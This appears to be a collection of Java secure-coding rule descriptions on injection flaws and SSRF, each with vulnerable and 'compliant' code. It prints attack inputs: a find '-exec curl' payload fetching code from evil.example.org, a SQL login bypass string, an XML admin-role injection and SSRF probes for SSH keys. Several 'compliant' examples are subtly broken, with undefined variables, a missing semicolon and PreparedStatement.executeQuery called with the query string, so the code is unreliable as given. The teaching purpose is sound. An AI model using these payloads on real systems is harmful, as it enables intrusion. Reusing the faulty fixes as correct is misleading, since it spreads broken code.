The following noncompliant code is vulnerable to LDAP injections because untrusted data is concatenated to an LDAP query without prior sanitization or validation.

Noncompliant code example

public boolean authenticate(HttpServletRequest req, DirContext ctx) throws NamingException {
  String user = req.getParameter("user");
  String pass = req.getParameter("pass");

  String filter = "(&(uid=" + user + ")(userPassword=" + pass + "))";

  NamingEnumeration<SearchResult> results = ctx.search("ou=system", filter, new SearchControls());
  return results.hasMore();
}

Compliant solution

public boolean authenticate(HttpServletRequest req, DirContext ctx) throws NamingException {
  String user = req.getParameter("user");
  String pass = req.getParameter("pass");

  String filter = "(&(uid={0})(userPassword={1}))";

  NamingEnumeration<SearchResult> results = ctx.search("ou=system", filter, new String[]{user, pass}, new SearchControls());
  return results.hasMore();
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For LDAP injection, the cleanest way to do so is to use parameterized queries if it is available for your use case.

Another approach is to sanitize the input before using it in an LDAP query. Input sanitization should be primarily done using native libraries.

Alternatively, validation can be implemented using an allowlist approach by creating a list of authorized and secure strings you want the application to use in a query. If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must sanitize and validate on the server-side. Not on client-side front-ends.

The most fundamental security mechanism is the restriction of LDAP metacharacters.

For Distinguished Names (DN), special characters that need to be escaped include:

  • \
  • #
  • +
  • <
  • >
  • ,
  • ;
  • "
  • =

For Search Filters, special characters that need to be escaped include:

  • *
  • (
  • )
  • \
  • null

For Java, OWASP’s functions encodeForDN and encodeForLDAP allow sanitizing these characters and should be used: Remember that it is never a good practice to reinvent the wheel and write your own encoders.
However, if it is not possible to use these libraries, here is an example of an encoder implementation for LDAP search filters, in the Bouncy Castle Java framework.

In the compliant solution example, the search function allows to safely parameterize the query.

Resources

Standards

javasecurity:S5883

Why is this an issue?

OS command argument injections occur when applications allow the execution of operating system commands from untrusted data but the untrusted data is limited to the arguments.
It is not possible to directly inject arbitrary commands that compromise the underlying operating system, but the behavior of the executed command still might be influenced in a way that allows to expand access, for example, execution of arbitrary commands. The security of the application depends on the behavior of the application that is executed.

What is the potential impact?

An attacker exploiting an arguments injection vulnerability will be able to add arbitrary argument to a system binary call. Depending on the command the parameters are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Java SE

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to argument injection because untrusted data is inserted in the arguments of a process call without prior validation or sanitization.
Here, the application ignores that a user-submitted parameter might contain special characters that will tamper with the expected system command behavior.

In this particular case, an attacker might add arbitrary arguments to the find command for malicious purposes. For example, the following payload will download malicious software on the application’s hosting server.

 -exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;

Noncompliant code example

@Controller
public class ExampleController
{
    @GetMapping(value = "/find")
    public void find(@RequestParam("filename") String filename) throws IOException {

        Runtime.getRuntime().exec("/usr/bin/find . -iname " + filename);
    }
}

Compliant solution

@Controller
public class ExampleController
{
    @GetMapping(value = "/find")
    public void find(@RequestParam("filename") String filename) throws IOException {

        String cmd1[] = new String[] {"/usr/bin/find", ".", "-iname", filename};
        Process proc = Runtime.getRuntime().exec(cmd1); // Compliant
    }
}

java.lang.Runtime is sometimes used over java.lang.ProcessBuilder due to ease of use. Flexibility in methods often introduces security issues as edge cases are easily missed. The compliant solution logic is also applied to java.lang.ProcessBuilder.

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

Here java.lang.Runtime.exec(String[] cmdarray) takes care of escaping the passed arguments and internally creates a single string given to the operating system to be executed.

Resources

Documentation

Standards

javasecurity:S6399

Why is this an issue?

XML injections occur when an application builds an XML-formatted string from user input without prior validation or sanitation. In such a case, a tainted user-controlled value can tamper with the XML string content. Especially, unexpected arbitrary elements and attributes can be inserted in the corresponding XML description.

A malicious injection payload could, for example:

  • Insert tags into the main XML document.
  • Add attributes to an existing XML tag.
  • Change the data value inside a tag.

A malicious user-supplied value can perform other modifications depending on where and how the constructed data is later used.

What is the potential impact?

The consequences of an XML injection attack on an application vary greatly depending on the application’s logic. It can affect the application itself or another element if the XML document is used for cross-component data exchange. For this reason, the actual impact can range from benign information disclosure to critical remote code execution.

Information disclosure

An attacker can forge an attack payload that will modify the XML document so that it will become syntactically incorrect. In that case, when the data is later used, the parsing component will raise a technical error. If displayed back to the attacker or made available through log files, this technical error may disclose sensitive business or technical information.

This scenario, while in general the less severe one, is the most frequently encountered. It can combine with any other logic-dependant threat.

Internal requests tampering

Some applications communicate with backend micro-services APIs using XML-based protocols such as SOAP. When those applications are vulnerable to XML injections, attackers can tamper with the internal requests' content. This will allow them to change internal requests' parameters or locations which, in turn, can lead to various consequences like performing unauthorized actions or accessing sensitive data.

For example, altering a user creation request in such a way can lead to a privilege escalation if attackers manage to modify the default account privilege level.

Code execution

An application might build objects based on an XML serialization string. In that case, an attacker that would exploit an XML injection could be able to alter the serialization string to modify the corresponding object’s properties.

Depending on the deserialization process, this might allow instantiating arbitrary objects or objects with sensitive properties altered. This can lead to arbitrary code being executed in the same way as a deserialization injection vulnerability.

How to fix it in Java SE

Code examples

The following code is an example of an overly simple authentication function: The role of a user is set in an XML file and the default user role is user.
This example code is vulnerable to an XML injection vulnerability because it builds an XML string from user input without prior sanitation or validation.

In this particular case, the query can be exploited with the following string:

attacker</username><role>admin</role></user>
<user><username>foo

By adapting and inserting this string into the username field, an attacker would be able to log in as an admin.

Noncompliant code example

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    String xml =
        """<user>
            <username>"""+req.getParameter("username")+"""</username>
            <role>user</role>
        </user>""";

    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

    try {
        DocumentBuilder builder = factory.newDocumentBuilder();
        builder.parse(new InputSource(new StringReader(xml))); // Noncompliant
    } catch (ParserConfigurationException | SAXException e) {
        resp.sendError(400);
    }
}

Compliant solution

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {

    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

    try {
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.newDocument();
        Element user = doc.createElement("user");
        doc.appendChild(user);

        Element usernameElement = doc.createElement("username");
        user.appendChild(usernameElement);
        username_element.setTextContent(req.getParameter("username"));

        Element role = doc.createElement("role");
        user.appendChild(role);
        role.setTextContent("user");

    } catch (ParserConfigurationException e) {
        resp.sendError(400);
    }
}

How does this work?

In most cases, building XML strings with a direct concatenation of user input is discouraged. While not always possible, a strong pattern-based validation can help sanitize tainted inputs. Likewise, converting to a harmless type can sometimes be a solution.

However, directly constructing Java objects should be preferred over handling the properties of objects as strings.

Programmatic object building

In most cases, an application can directly create documents from user input without having to build and parse an XML string. Doing so prevents injection vulnerabilities as XML document construction libraries and functions will properly escape and check the type of input values.

Sometimes, the application might need to include the user input in a document built from a trusted XML string. In that case, the recommended solution is to parse the trusted string first and then programmatically modify the resulting document.

The example compliant code takes advantage of the javax.xml and org.w3c.dom libraries capabilities to programmatically build XML documents.

Converting to a harmless type

When the application allows it, casting user-submitted data to a harmless type can help prevent XML injection vulnerabilities. In particular, converting user inputs to numeric types is an efficient sanitation mechanism.

This mechanism can be extended to other types, including more complex ones. However, care should be taken when dealing with them, as manually validating or sanitizing complex types can represent a challenge.

Note that choosing this solution can be error-prone: every user input has to be validated or sanitized without oversight.

Resources

Standards

javasecurity:S5145

Why is this an issue?

Log injection occurs when an application fails to sanitize untrusted data used for logging.

An attacker can forge log content to prevent an organization from being able to trace back malicious activities.

What is the potential impact?

If an attacker can insert arbitrary data into a log file, the integrity of the chain of events being recorded can be compromised.
This frequently occurs because attackers can inject the log entry separator of the logger framework, commonly newlines, and thus insert artificial log entries.
Other attacks could also occur requiring only field pollution, such as cross-site scripting (XSS) or code injection (for example, Log4Shell) if the logged data is fed to other application components, which may interpret the injected data differently.

The focus of this rule is newline character replacement.

Log Forge

An attacker, able to create independent log entries by injecting log entry separators, inserts bogus data into a log file to conceal his malicious activities. This obscures the content for an incident response team to trace the origin of the breach as the indicators of compromise (IoCs) lead to fake application events.

How to fix it in Java SE

Code examples

The following code is vulnerable to log injection as it constructs log entries using untrusted data. An attacker can leverage this to manipulate the chain of events being recorded.

Noncompliant code example

private static final Logger logger = Logger.getLogger("Logger");

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {

  String data = request.getParameter("data");
  if(data != null){
    logger.log(Level.INFO, "Data: {0} ", data);
  }
}

Compliant solution

private static final Logger logger = Logger.getLogger("Logger");

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {

  String data = request.getParameter("data");
  if(data != null){
    data = data.replaceAll("[\n\r]", "_");
    logger.log(Level.INFO, "Data: {0} ", data);
  }
}

How does this work?

Data used for logging should be content-restricted and typed. This can be done by validating the data content or sanitizing it.
Validation and sanitization mainly revolve around preventing carriage return (CR) and line feed (LF) characters. However, further actions could be required based on the application context and the logged data usage.

Resources

Standards

javasecurity:S5167

This rule is deprecated; use S5122, S5146, S6287 instead.

Why is this an issue?

User-provided data, such as URL parameters, POST data payloads, or cookies, should always be considered untrusted and tainted. Applications constructing HTTP response headers based on tainted data could allow attackers to change security sensitive headers like Cross-Origin Resource Sharing headers.

Web application frameworks and servers might also allow attackers to inject new line characters in headers to craft malformed HTTP response. In this case the application would be vulnerable to a larger range of attacks like HTTP Response Splitting/Smuggling. Most of the time this type of attack is mitigated by default modern web application frameworks but there might be rare cases where older versions are still vulnerable.

As a best practice, applications that use user-provided data to construct the response header should always validate the data first. Validation should be based on a whitelist.

Noncompliant code example

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
  String value = req.getParameter("value");
  resp.addHeader("X-Header", value); // Noncompliant
}

Compliant solution

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    String value = req.getParameter("value");

    String whitelist = "safevalue1 safevalue2";
    if (!whitelist.contains(value))
      throw new IOException();

    resp.addHeader("X-Header", value); // Compliant
}

Resources

javasecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Apache Commons

Code examples

The following code is vulnerable to command injections because it is using untrusted inputs to set up a new process. Therefore an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

@Controller
public class ExampleController
{
    @GetMapping(value = "/exec")
    public void exec(@RequestParam("command") String command) throws IOException {

        CommandLine cmd = new CommandLine(command);
        DefaultExecutor executor = new DefaultExecutor();
        executor.execute(cmd);
    }
}

Compliant solution

@Controller
public class ExampleController
{
    @GetMapping(value = "/exec")
    public void exec(@RequestParam("command") String command) throws IOException {

        List<String> allowedCmds = new ArrayList<String>();
        allowedCmds.add("/bin/ls");
        allowedCmds.add("/bin/cat");

        if (allowedCmds.contains(command)){
            CommandLine cmd = new CommandLine(command);
            DefaultExecutor executor = new DefaultExecutor();
            executor.execute(cmd);
        }
    }
}

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple regexes to avoid ReDOS attacks. For example, you can accept only a specific set of executables, by using ^/bin/(ls|pwd|grep)$.

Important note: The application must do validation on the server side. Not on client-side front-ends.

Neutralize special characters

If the application is to execute complex commands that cannot be controlled thanks to pre-approved lists, the cleanest approach is to use special sanitization components, such as org.apache.commons.exec.CommandLine.addArguments(String[] addArguments).

The library helps you to get rid of common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • \`
  • \\
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters count ', - and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since its version 2.24.

Here org.apache.commons.exec.CommandLine.addArguments(String[] addArguments) takes care of escaping the passed arguments and internally creates a single string given to the operating system to be executed.

Resources

Documentation

Standards

javasecurity:S5147

Why is this an issue?

NoSQL injections occur when an application retrieves untrusted data and inserts it into a database query without sanitizing it first.

What is the potential impact?

In the context of a web application that is vulnerable to NoSQL injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data leakage

In the context of simple query logic breakouts, a malicious database query enables privilege escalation or direct data leakage from one or more databases.
This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) as missing data can disrupt the regular operations of an organization.

Chaining NoSQL injections with other vulnerabilities

Attackers who exploit NoSQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Legacy Mongo Java API

Code examples

The following code is vulnerable to NoSQL injections because untrusted data is concatenated to the $where operator. This operator indicates to the backend that the expression needs to be interpreted, resulting in code injection.

Noncompliant code example

import com.mongodb.MongoClient;
import com.mongodb.DB;
import com.mongodb.DBCollection;
import com.mongodb.BasicDBObject;

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws UnknownHostException
{
    String input = req.getParameter("input");

    MongoClient mongoClient = new MongoClient();
    DB database             = mongoClient.getDB("ExampleDatabase");
    DBCollection collection = database.getCollection("exampleCollection");
    BasicDBObject query     = new BasicDBObject();

    query.append("$where", "this.field == \"" + input + "\"");

    collection.find(query);
}

Compliant solution

import com.mongodb.MongoClient;
import com.mongodb.DB;
import com.mongodb.DBCollection;
import com.mongodb.BasicDBObject;

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws UnknownHostException
{
    String input = req.getParameter("input");

    MongoClient mongoClient = new MongoClient();
    DB database             = mongoClient.getDB("ExampleDatabase");
    DBCollection collection = database.getCollection("exampleCollection");
    BasicDBObject query     = new BasicDBObject();

    query.append("field", input);

    collection.find(query);
}

How does this work?

Pre-approved list

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For NoSQL injections, the cleanest way to do so is to validate the input before using it in a query.

Create a list of authorized and secure strings that you want the application to be able to use in a query.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

The list can be either a regex string, an array, or validators on specific ranges of characters. If you use regexes, choose simple regexes to avoid ReDOS attacks.

Important note: The application must do validation on the server side. Not on client-side front-ends.

Operators are to be classified as dangerous

As a rule of thumb if no operators are needed, you should generally reject user input containing them. If some operators are necessary, you should restrict their use.

Some operators execute JavaScript, and their use should be restricted for both untrusted input and internal code.
These operators include:

  • $where
  • $function
  • $accumulator
  • mapReduce

Depending on your use case, you should first try using regular API calls before using any of these operators.
For example, using a $where operator is unnecessarily complex when only a simple search is required. It also leads to performance problems.

Note: Server-side scripting can be disabled.

Regular operators can also lead to data leaks.
For example, attackers can use "comparison query operators" in their attack data to trick the backend database into giving hints about sensitive information or entirely giving it out.

In the previous example, the untrusted data doesn’t need validation for its use case. Moving it out of a $where expression into a proper field query is enough.

Resources

Articles & blog posts

Standards

javasecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Java SE

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters, and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.

Noncompliant code example

@RestController
public class ApiController
{
    @Autowired
    Connection connection;

    @GetMapping(value = "/authenticate")
    @ResponseBody
    public ResponseEntity<String> authenticate(
        @RequestParam("user") String user,
        @RequestParam("pass") String pass) throws SQLException
    {
        String query = "SELECT * FROM users WHERE user = '" + user + "' AND pass = '" + pass + "'";

        try (Statement statement = connection.createStatement()) {

            ResultSet resultSet = statement.executeQuery(query);

            if (!resultSet.next()) {
                return new ResponseEntity<>("Unauthorized", HttpStatus.UNAUTHORIZED);
            }
        }

        return new ResponseEntity<>("Authentication Success", HttpStatus.OK);
    }
}

Compliant solution

@RestController
public class ApiController
{
    @Autowired
    Connection connection;

    @GetMapping(value = "/authenticate")
    @ResponseBody
    public ResponseEntity<String> authenticate(
        @RequestParam("user") String user,
        @RequestParam("pass") String pass) throws SQLException
    {
        String query = "SELECT * FROM users WHERE user = ? AND pass = ?";

        try (PreparedStatement statement = connection.prepareStatement(query)) {
            statement.setString(1, user);
            statement.setString(2, pass);

            ResultSet resultSet = statement.executeQuery(query);

            if (!resultSet.next()) {
                return new ResponseEntity<>("Unauthorized", HttpStatus.UNAUTHORIZED);
            }
        }

        return new ResponseEntity<>("Authentication Success", HttpStatus.OK);
    }
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string (Java SE syntax):

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms, depending on the library used. For the above example, the question mark symbol '?' was used as a placeholder.

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a prepareStatement function that explicitly does so, and some do not - because they do it transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.

Resources

Articles & blog posts

Standards

javasecurity:S6390

Why is this an issue?

Most modern applications use threads to handle incoming requests or other long-running tasks concurrently. In some cases, the number of concurrent threads is limited to avoid system resource exhaustion due to too numerous actions being run.

When an application uses user-controlled data as a parameter of a thread suspension operation, a Denial of Service attack can be made possible.

What is the potential impact?

An attacker with the capability to insert an arbitrary duration into a thread suspension operation could suspend the corresponding thread for a long time. Depending on the application’s architecture and the thread handling logic, this can lead to a complete Denial of Service of the application.

Indeed, if the number of threads, either created by the application or allocated by a web server, is limited, the attacker will be able to suspend all of them at the same time. Without any remaining thread to handle actions, the application might badly answer, be slowed down, or become completely irresponsive.

How to fix it in Java SE

Code examples

This code is vulnerable to a Denial of Service because it sets a thread’s suspension time from user input without prior validation or sanitation.

Noncompliant code example

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        Long time = Long.parseLong(req.getParameter("time"));
        try {
            Thread.sleep(time); // Noncompliant
        } catch (InterruptedException e) {
            resp.sendError(500);
        }
    }

Compliant solution

protected void compliant(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        Long time = Long.parseLong(req.getParameter("time"));
        try {
            Thread.sleep(Math.min(time, 1000));
        } catch (InterruptedException e) {
            resp.sendError(500);
        }
    }

How does this work?

In most cases, it is discouraged to define a thread suspension time from user-input.

If really necessary, the application should ensure that the provided suspension time is below a safe limit. Such a limit should be evaluated and set to the lowest possible time that ensures the application’s operation and restricts denial of service attacks.

The example compliant code uses the Math.min function to ensure the suspension duration is below the limit of one second.

Note that even when the suspension time is limited, an attacker who submits numerous requests at high speed can still manage always to consume all available threads.

Resources

Standards

javasecurity:S6398

Why is this an issue?

JSON injections occur when an application builds a JSON-formatted string from user input without prior validation or sanitation. In such a case, a tainted user-controlled value can tamper with the JSON string content. Especially, unexpected arbitrary elements can be inserted in the corresponding JSON object. Those modifications can include:

  • Adding additional keys to a JSON dictionary.
  • Changing values types.
  • Adding elements in an array.

A malicious user-supplied value can perform other modifications depending on where and how the constructed data is later used.

What is the potential impact?

The consequences of a JSON injection attack into an application vary greatly depending on the application’s logic. It can affect the application itself or another element if the JSON string is used for cross-component data exchange. For this reason, the actual impact can range from benign information disclosure to critical remote code execution.

Information disclosure

An attacker can forge an attack payload that will modify the JSON string so that it will become syntactically incorrect. In that case, when the data is later used, the parsing component will raise a technical error. If displayed back to the attacker or made available through log files, this technical error may disclose sensitive business or technical information.

This scenario, while in general the less severe one, is the most frequently encountered. It can combine with any other logic-dependant threat.

Privilege escalation

An application that would rely on JSON to store or propagate users' authentication levels and roles would be under threat of privilege escalations. Indeed, an attacker could tamper with the permissions storage object to insert arbitrary roles or privileges.

While highly specific, similar issues can be faced in the following situations:

  • An application builds JSON payloads for HTTP requests.
  • An application builds JWT from user input.

Code execution

An application might build objects based on a JSON serialization string. In that case, an attacker that would exploit a JSON injection could be able to alter the serialization string to modify the corresponding object’s properties.

Depending on the deserialization process, this might allow instantiating arbitrary objects or objects with sensitive properties altered. This can lead to arbitrary code being executed in the same way as a deserialization injection vulnerability.

How to fix it in Java SE

Code examples

The following code is vulnerable to a JSON injection vulnerability because it builds a JSON string from user input without prior sanitation or validation. Therefore, an attacker can submit a tainted value that will tamper with the corresponding JSON object structure.

Noncompliant code example

import org.json.JSONObject;

public void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    try {
        String tainted = request.getParameter("value");
        String json = "{\"key\":\""+ tainted +"\"}";
        JSONObject obj = new JSONObject(json); // Noncompliant
    } catch (JsonException e) {
        resp.sendError(400)
    }
}

Compliant solution

import org.json.JSONObject;

public void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    JSONObject obj = new JSONObject(json);
    obj.put("key", request.getParameter("value"));
}

How does this work?

In most cases, it is discouraged to build JSON strings with a direct concatenation of user input. While not always possible, a strong pattern-based validation can help sanitize tainted inputs. Likewise, converting to a harmless type can sometimes be a solution.

However, avoiding handling objects' properties as strings by directly constructing Java objects should be the preferred way.

Programmatic object building

In most cases, an application can directly create objects from user input without having to build and parse a JSON string. Doing so prevents injection vulnerabilities as JSON object construction libraries and functions will properly escape and check the type of input values.

Sometimes, the application might need to include the user input in an object built from a trusted JSON string. In that case, the recommended solution is to parse the trusted string first and then programmatically modify the resulting object.

The example compliant code uses the org.json libraries capabilities to dynamically build a JSON object without string parsing.

Converting to a harmless type

When the application allows it, converting user-submitted data to a harmless type can help prevent JSON injection vulnerabilities. In particular, converting user inputs to numeric types is an efficient sanitation mechanism.

This mechanism can be extended to other types, including more complex ones. However, care should be taken when dealing with them, as manually validating or sanitizing complex types can represent a challenge.

Note that choosing this solution can be error-prone: every user input has to be validated or sanitized without oversight.

Resources

Documentation

Standards

javasecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the coerced request on the application is not a barrier to exploitation and thus must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Conditional to what is reachable, remote command execution can be achieved, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internal accessible ports from the affected server or others to which the server can communicate by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemas (dependent on the affected system), for example, gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in Java SE

Code examples

The following code is vulnerable to SSRF as it performs an HTTP request to a URL defined by untrusted data.

Noncompliant code example

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    String location = req.getParameter("url");

    URL url = new URL(location);

    HttpURLConnection  conn = (HttpURLConnection) url.openConnection();
}

Compliant solution

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    String location = req.getParameter("url");

    List<String> allowedHosts = new ArrayList<String>();
    allowedHosts.add("https://trusted1.example.com/");
    allowedHosts.add("https://trusted2.example.com/");

    URL url = new URL(location);

    if (allowedHosts.contains(location))
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
}

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.commit.malicious.io.

Resources

Standards

javasecurity:S6350

Constructing arguments of system commands from user input is security-sensitive. It has led in the past to the following vulnerabilities:

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

String input = request.getParameter("input");
String cmd[] =  new String[] { "/usr/bin/find", input };
Runtime.getRuntime().exec(cmd); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

String input = request.getParameter("input");
if (allowed.contains(input)) {
  String cmd[] =  new String[] { "/usr/bin/find", input };
  Runtime.getRuntime().exec(cmd);
}

See

javasecurity:S6173

Why is this an issue?

